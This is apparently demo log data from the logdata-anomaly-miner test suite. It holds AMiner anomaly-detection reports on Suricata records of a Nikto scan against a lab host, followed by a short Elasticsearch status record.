"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46968,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.Big5\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.Big5\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46968,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.Big5\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.Big5\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.Big5\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.Big5\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.Big5", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.Big5", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46968,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46968, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":1414354189338696,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 1414354189338696, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.380109+0000\",\"flow_id\":1414354189338696,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46968,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.Big5\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.Big5\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.38 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.382662 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46970 -> 192.168.10.154:80", "/parser/model/time": 1583349514.382662, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46970, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.382662 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46970 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.38 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.10:100", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.382965+0000\",\"flow_id\":268736087642508,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46970,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.10:100\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.10:100\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.382965, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":268736087642508,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46970,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.10:100\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.10:100\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46970,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.10:100\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.10:100\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.10:100\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.10:100\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.10:100", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.10:100", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46970,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46970, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":268736087642508,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 268736087642508, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.382965+0000\",\"flow_id\":268736087642508,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46970,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.10:100\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.10:100\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.38 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.385406 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46972 -> 192.168.10.154:80", "/parser/model/time": 1583349514.385406, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46972, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.385406 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46972 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.39 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.nsf", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.386008+0000\",\"flow_id\":1931339402763667,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46972,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.nsf\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.nsf\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.386008, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":1931339402763667,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46972,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.nsf\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.nsf\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46972,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.nsf\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.nsf\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.nsf\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.nsf\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.nsf", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.nsf", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46972,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46972, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":1931339402763667,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 1931339402763667, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.386008+0000\",\"flow_id\":1931339402763667,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46972,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.nsf\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.nsf\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.39 ], "LogLinesCount": 1 } }logdata-anomaly-miner-2.6.1/aecid-testsuite/demo/aminerJsonInputDemo/json_logs/elastic.log000066400000000000000000002130261437606560100320130ustar00rootroot00000000000000{"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"mDPoLXYBIkOurnXX5Icg","_score":1.0,"_source":{"FromTime":1.607087995611796E9,"StatusInfo":{"/parser/model/php":0,"/parser/model/event_type_str":100,"/parser/model/type_str":14916,"/parser/model/classification":0,"/parser/model/status_code":21,"/parser/model/host":10,"/parser/model/sp":0},"timestamp":"2020-12-04T13:20:06.072Z","ToTime":1.607088005611873E9,"fromtimestamp":"2020-12-04T13:19:55.611Z","totimestamp":"2020-12-04T13:20:05.611Z","version":"1"}}]}} 